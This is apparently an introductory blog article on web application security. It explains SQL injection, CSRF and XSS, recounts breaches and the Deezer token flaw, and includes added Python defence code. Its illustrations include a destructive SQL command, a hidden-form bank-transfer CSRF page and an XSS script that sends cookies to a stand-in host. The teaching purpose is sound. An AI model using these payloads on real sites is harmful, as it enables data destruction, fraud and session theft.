The security of our web applications, or cybersecurity, plays a crucial role in the protection of sensitive data and in building user trust. In this article, learn about the most common types of attacks, the risks you may be facing, and how to avoid them.
In today’s world, where technology plays a fundamental role in our lives, web application security has become an undeniable priority.
Many of us have had access to a tablet, mobile phone or computer since we were born, and we spend hours and hours on the internet, a complex and interesting place, full of information and misinformation.
Today, we’ll explore how cybersecurity plays a crucial role in protecting sensitive data and building user trust.
In this article, I will explain a little more about the world we use so much, the internet, a world that is not without its dangers if we do not know how to protect ourselves!
The Current Landscape
You may be surprised, but there are many websites that, as you read this, are full of vulnerabilities that an ill-intentioned person could try to exploit.
It is not possible to say for sure how many websites are exposed, given the size and complexity of the web ecosystem, but estimates can be made. A study carried out by the OWASP organization in 2021 showed that a high percentage of websites are exposed to various types of attacks:
Image taken from: https://www.researchgate.net/figure/Percentage-probability-of-websites-vulnerable-by-different-class-of-cyber-vulnerabilities_fig1_279869021
Types of Attacks
SQL Injection – Injecting SQL Commands (Databases)
Imagine that we are the sole developers of a web page that sells shampoos. We have a database of 1,000,000 registered users and we appear in every fashion magazine in the country.
All goes well until the day it doesn’t. Unfortunately, we do not validate input against SQL command injection and, when a less well-intentioned user goes to register, they put the following text in the “User Name” field: DROP DATABASE IF EXISTS mydatabase;
DROP DATABASE IF EXISTS mydatabase is an SQL command that, when executed, completely deletes the “mydatabase” database. From that point on, there is no going back. We have lost all the information we had on our beloved website and, consequently, our work.
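As an added example (not code from the article), here is the shampoo shop’s registration step written twice: once with the user’s text glued into the SQL string, and once with a parameterized statement plus an allow-list check. The table layout, the allow-list pattern and the in-memory SQLite database are assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed sample input: the exact text the article's malicious user typed
# into the "User Name" field of the shampoo shop.
HOSTILE_USERNAME = "DROP DATABASE IF EXISTS mydatabase;"

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.'-]{3,32}$")  # hypothetical allow-list for this shop


def is_valid_username(username: str) -> bool:
    """First line of defence: accept only the characters a real username needs.
    Spaces and semicolons are not among them, so the hostile value is refused."""
    return USERNAME_RE.fullmatch(username) is not None


def open_shop_db() -> sqlite3.Connection:
    """In-memory stand-in for the shop's user database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    return conn


def build_insert_unsafe(username: str) -> str:
    """The vulnerable pattern: user text is glued into the SQL string, so the
    input becomes part of the statement itself. Shown only for comparison."""
    return f"INSERT INTO users (name) VALUES ('{username}')"


def register_user(conn: sqlite3.Connection, username: str) -> int:
    """The fix: a parameterized statement. The value travels separately from the
    SQL text, so the driver stores it as data no matter what it contains."""
    cur = conn.execute("INSERT INTO users (name) VALUES (?)", (username,))
    conn.commit()
    return cur.lastrowid


def stored_names(conn: sqlite3.Connection) -> list:
    """Return every stored username in insertion order."""
    return [row[0] for row in conn.execute("SELECT name FROM users ORDER BY id")]
```

Note that a name such as O'Brien passes the allow-list and is stored correctly by the parameterized insert, which is exactly where hand-built SQL strings tend to break.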
Cross-site Request Forgery (CSRF)
This type of cyber attack happens when we visit a malicious website, let’s call it A, and click on something there that makes our browser send a request to website B, where we are logged in. Here’s a concrete example:
Our friend sent us a suspicious link via WhatsApp. He sent the message “CLICK HERE TO GET BITCOIN FREE HACK!!”.
Within the website there is a big red button that says “CLICK HERE FOR MONEY”.
Hoping to become as rich as Elon Musk, we ended up clicking on the link.
The problem is that it has the opposite effect, because the button transfers all the money we have to another account. Here is the HTML of the page we just loaded:
<form action="https://bank.com/transfer" method="POST">
    <input type="hidden" name="toAccount" value="PT501234">
    <input type="hidden" name="amount" value="1000 €">
    <input type="submit" value="CLICK HERE FOR MONEY">
</form>
Since we are logged into our bank, the browser sends our session cookie along with that request, so the bank’s website thinks that we are the one asking for the transfer.
And with a simple click we are one step closer to becoming the next billionaire.
Is it clear why we shouldn’t click on random links on the internet?
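The usual fix for the bank in this story is a CSRF token: a random value that only the bank’s own pages carry, which the server checks on every transfer. The block below is an added example, not code from the article; the session store, form fields and status codes are assumptions.

```python
import hmac
import secrets

# In-memory stand-in for the bank's server-side session store (constructed for the example).
SESSIONS: dict = {}


def login(user: str) -> str:
    """Create a session and mint a random CSRF token that only lives on the server
    and in pages the bank itself renders."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return session_id


def render_transfer_form(session_id: str) -> str:
    """The bank's genuine transfer form carries the session's token in a hidden field."""
    token = SESSIONS[session_id]["csrf"]
    return (
        '<form action="https://bank.com/transfer" method="POST">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input type="text" name="toAccount">\n'
        '  <input type="text" name="amount">\n'
        '  <input type="submit" value="Transfer">\n'
        "</form>"
    )


def handle_transfer(cookies: dict, form: dict) -> tuple:
    """Server side of POST /transfer. The browser attaches the session cookie even when
    the form came from site A, so the cookie alone must not authorise the transfer:
    the request also has to carry the token that site A could never have read."""
    session = SESSIONS.get(cookies.get("session", ""))
    if session is None:
        return 401, "not logged in"
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {form['amount']} to {form['toAccount']}"
```

Issuing the session cookie with SameSite=Lax adds a second layer, because the browser then does not attach it to a POST that originates from another site.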
Cross-site Scripting (XSS)
Imagine we have a successful blog with millions of readers, almost as good as KWAN’s blog. We have a comment system where a user can leave a comment on the blog.
Normal people write short comments like “I loved it”, “I found it quite interesting”.
But there are also people who write comments like:
<script>
    var img = new Image();
    img.src = 'https://malicious-site.com/steal?cookie=' + document.cookie;
</script>
This is JavaScript code, not a normal comment. But what’s the problem?
The comment is saved. Now, whenever a user opens the blog, the malicious script is loaded as if it were a simple “comment”.
The problem is that the comment is JavaScript code, so it is executed in the user’s browser. Only God knows what happens next. But having unknown code executed on a user’s computer can only be a bad sign…
In the example given, the script sends the user’s cookies to “malicious-site.com”.
This is potentially dangerous because the cookie could contain the user’s session information, allowing the attacker to access their account. Ultimately, just because the site was not protected against script injection, anyone who opens the blog page will have their account compromised.
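Two defences close the hole in the blog story: encode comments when they are rendered, so the browser shows the text of the script instead of running it, and mark the session cookie HttpOnly so document.cookie cannot read it. The block below is an added example, not the article’s code; the list-item markup and the cookie name are assumptions.

```python
import html
import re

# Constructed sample comments; the last one is the script from the article.
COMMENTS = [
    "I loved it",
    "I found it quite interesting",
    "<script>\nvar img = new Image();\n"
    "img.src = 'https://malicious-site.com/steal?cookie=' + document.cookie;\n</script>",
]

WRAPPER_OPEN, WRAPPER_CLOSE = '<li class="comment">', "</li>"


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the stored text is pasted into the page as-is, so a <script> tag runs."""
    return f"{WRAPPER_OPEN}{comment}{WRAPPER_CLOSE}"


def render_comment(comment: str) -> str:
    """Fixed: HTML-encode on output. '<' becomes '&lt;' and quotes are encoded too
    (quote=True), so the browser displays the script text instead of executing it."""
    return f"{WRAPPER_OPEN}{html.escape(comment, quote=True)}{WRAPPER_CLOSE}"


def contains_active_html(rendered: str) -> bool:
    """Check used by the test: is there still a raw tag inside our own wrapper?"""
    inner = rendered[len(WRAPPER_OPEN):-len(WRAPPER_CLOSE)]
    return re.search(r"<\s*/?\s*[a-zA-Z]", inner) is not None


def session_cookie_header(session_id: str) -> str:
    """HttpOnly keeps the cookie out of document.cookie, so even a script that does run
    cannot read it; Secure and SameSite limit where the browser will send it."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"
```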
Well-Known Cases of Celebrities in the Technology Field
There are countless cases of websites that, in one way or another, have been compromised. Facebook, Twitter, GitHub, Yahoo, LinkedIn, just to name a few.
No one is protected from these types of situations, not even the ‘giants’ in the technology sector.
Facebook
In 2019, Facebook faced a HUGE leak of sensitive information, exposing up to 533 million users. The information ended up being exposed on hacking forums.
LinkedIn
In 2021, attackers discovered an unauthenticated public API that provided information about LinkedIn users. They used it to scrape the information of more than 700 million users—about 92% of all LinkedIn users. This information was later put up for sale on the black market.
The Internet as a Weapon of War
Cyberattacks can have the same reach and cause as much damage as a weapon of war. The only difference is that there is no physical invasion of a country. There are countless reports of these attacks, and for those more interested in the subject, I will share the stories I found most interesting.
Stuxnet
A computer worm used to sabotage nuclear facilities (widely believed to have been made by the United States and Israel to attack Iran).
WannaCry
Ransomware that encrypts the files on infected computers and makes them inaccessible. There have been cases of attackers infecting hospital computers and demanding ransoms in Bitcoin to unlock the files again. As a result, treatments were postponed, which jeopardized the health of patients.
Passwords and Authentication: Be Careful!
Leaks
There is a well-known website that collects the data from every registered leak of sensitive information and lets you check whether a given email address appears in any of them: https://haveibeenpwned.com/
I advise you to take a look, as it is quite possible that a website you used as a child has been compromised and your password is for sale on the black market.
It’s not the end of the world: in most cases the password is hashed, though a weak password can still be cracked from its hash.
Passwords
There is also information on the most common passwords on websites. You can see this information at https://nordpass.com/most-common-passwords-list/.
Filter by country, and you will find that the most common password in Portugal is “123456”.
Deezer
There is a music website called Deezer. This website has a subscription system where, by having a premium account, we can download the songs to our computer.
So far so good; the problem is that they failed to implement a key security principle: token expiration.
When we log in to the website, a token is saved in our browser – this is how the website knows whether we are authenticated or not.
All subsequent actions we take on the website that may require authentication use this token as an authenticator.
The problem is that the Deezer token is valid for a whole year – this is not a good practice at all. The user can see and change this token. And if a user has access to another user’s token, it can be used to perform actions that require authentication, such as downloading songs.
This has created a genuine market where people sell tokens to access the premium version of the website.
This could easily be solved with a systematic token change protocol that shortens the token’s validity.
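As an added example (not Deezer’s code or the article’s), here is a signed token with an expiry claim and a rotation step: the token is valid for minutes rather than a year, the HMAC stops the user from editing the expiry in the browser, and a still-valid token can be exchanged for a fresh one. The claim names, the secret and the 15-minute lifetime are assumptions.

```python
import base64
import binascii
import hashlib
import hmac
import json
import time
from typing import Optional

SERVER_SECRET = b"constructed-example-secret"  # a real service loads this from a secret store
ONE_YEAR = 365 * 24 * 3600                     # roughly how long the article says Deezer's token lives
SHORT_TTL = 15 * 60                            # a short-lived token instead: 15 minutes


def _sign(claims: bytes) -> str:
    mac = hmac.new(SERVER_SECRET, claims, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode()


def issue_token(user: str, ttl: int, now: Optional[float] = None) -> str:
    """Token = base64(JSON claims) '.' HMAC. The 'exp' claim is the expiry the article
    says was effectively missing; ttl controls how far ahead it is."""
    now = time.time() if now is None else now
    claims = json.dumps({"sub": user, "iat": int(now), "exp": int(now) + ttl}).encode()
    return base64.urlsafe_b64encode(claims).decode() + "." + _sign(claims)


def verify_token(token: str, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the signature matches and the token has not expired, else None.
    The HMAC covers the claims, so editing 'exp' or 'sub' in the browser breaks it."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".", 1)
        claims = base64.urlsafe_b64decode(body)
    except (ValueError, binascii.Error):
        return None
    if not hmac.compare_digest(sig, _sign(claims)):
        return None
    data = json.loads(claims)
    return None if data["exp"] <= now else data


def rotate_token(token: str, now: Optional[float] = None) -> Optional[str]:
    """The systematic token change the article asks for: a still-valid token is
    exchanged for a fresh short-lived one; an expired or forged one gets nothing."""
    data = verify_token(token, now)
    return None if data is None else issue_token(data["sub"], SHORT_TTL, now)
```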
Is There a Solution?
Of course, but it is something that needs to be worked on. As Bruce Schneier said, “security is a process, not a product”.
Cybersecurity is a constantly evolving area and there is no one-size-fits-all solution.
Our best friend? INFORMATION.
Following the best practices and security measures that exist is, without a doubt, the best step to take.
There are several sources of information on the topic, but the best known and most used is OWASP.
OWASP is a non-governmental organization dedicated to promoting software security. It offers tools, documentation, projects, and training that greatly assist in making us better professionals and help us defend against these types of problems.
OWASP also publishes a Top 10 of the most common vulnerabilities in web applications, the most recent edition being from 2021, which I recommend every programmer working in web development to read.
Cybersecurity: Types of Online Attacks & Best Practices – Final Considerations
In a world so dependent on the internet, having knowledge about cybersecurity is essential!
The current scenario reveals that many websites are still vulnerable, as indicated by studies, highlighting the urgency of implementing robust security measures. In this article we also discussed notable cases of security breaches on well-known platforms, such as Facebook and LinkedIn, showing that even technology giants are not immune to these threats.
To address these ever-evolving challenges, I emphasize the importance of information and the critical role of OWASP as a valuable source of security guidelines and best practices.
As we continue to understand cybersecurity, I will delve even deeper into this topic in the next article. We will explore new threats, advanced protection techniques, and updates on cybersecurity trends. Be prepared to unlock the secrets of advanced cybersecurity practices and discover how to effectively protect your systems against evolving digital threats. For now, I recommend reading this article on DevSecOps.